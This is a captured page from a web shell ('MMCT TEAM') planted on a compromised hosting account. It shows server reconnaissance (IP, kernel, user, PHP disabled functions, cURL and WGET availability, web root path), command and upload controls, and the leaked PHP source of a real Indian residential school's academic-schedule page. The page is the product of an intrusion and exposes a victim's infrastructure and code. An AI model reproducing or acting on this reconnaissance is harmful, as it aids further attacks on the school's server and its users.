MMCT TEAM
Server IP : 86.38.243.181  /  Your IP : 216.73.216.51
Web Server : LiteSpeed
System : Linux in-mum-web1336.main-hosting.eu 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64
User : u986601745 ( 986601745)
PHP Version : 7.4.33
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u986601745/domains/emrskalsi.com/public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/u986601745/domains/emrskalsi.com/public_html/academic-schedule.php
<!DOCTYPE html>
<html lang="en" style="overflow-x: hidden;">
<head>
   <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>EKLAVYA MODEL RESIDENTIAL SCHOOL - Academic Schedule</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<meta name="description" content="Find the academic schedule for Eklavya Model Residential School (EMRS) Kalsi, Dehradun. Stay updated with important academic dates, exams, holidays, and school activities for the academic year.">
<meta name="keywords" content="EMRS Academic Schedule, Eklavya Model Residential School Calendar, Academic Calendar Dehradun, EMRS Kalsi Academic Year, School Timetable, Tribal School Schedule, Exam Dates EMRS, Holiday List EMRS, EMRS Academic Activities, Ministry of Tribal Affairs School Schedule">
<meta property="og:title" content="EKLAVYA MODEL RESIDENTIAL SCHOOL - Academic Schedule" />
<meta property="og:description" content="Find the academic schedule for Eklavya Model Residential School (EMRS) Kalsi, Dehradun. Stay updated with important academic dates, exams, holidays, and school activities for the academic year." />
<meta property="og:image" content="https://emrskalsi.com/images/logo.png" />
<meta property="og:url" content="https://emrskalsi.com/academic-schedule.php" />
<meta property="og:type" content="website" />


<?php include('include/header.php'); ?>

<div class="breadcrumbs">
    <div class="container">

    <!--    <h1 class="pull-left">
    Academic Schedule</h1> -->

    <ul class="pull-left breadcrumb">
        <li><a href="javascript:void(0)">Academics</a></li>
        <li><a href="javascript:void(0)">Academic Schedule</a></li>
    </ul>
    
</div>
</div>

</div>

<style>.menshow{display:block !important}
.table{
    width: 100%;
}
</style>

</div></div><section class="academic_schedule" id="pr">
    <div class="row container acadsec"><div class="col-md-12 col-sm-12 col-lg-12 col-xs-12" ><div class="ap-tab-section tabs_tmt">

        <div class="headline" id="headlines"><h2 style="font-size:26px!important">Eklavya Model Residential School Kalsi, Dehradun(Uttarakhand) Schedule-<?php echo date('Y') ?>-<?php echo date('y')+1 ?></h2></div>
        
        <table class="table table-bordered text-center" border="1" cellspacing="0">
            <thead>

                <tr>
                    <td>S.NO.</td>
                    <td>Time</td>
                    <td>Schedule</td>

                </tr>

            </thead>
            <tbody>
                <?php
                $q = "select * from time_table";
                $query = mysqli_query($conn,$q);
                $i=1;
                while($res = mysqli_fetch_array($query)) { 
                    $start_time=date('h:i A', strtotime($res['start_time'])); 
                    $end_time=date('h:i A', strtotime($res['end_time'])); 
                    ?>
                    <tr>

                     <td><?php echo $i++; ?></td>
                     <td><?php echo $start_time; ?> To <?php echo $end_time ?></td>
                     <td><?php echo $res['schedule'] ?></td>


                </tr>
            <?php } ?>
        </tbody>
    </table>
</div>
</section>
<?php include('include/footer.php'); ?>

MMCT - 2023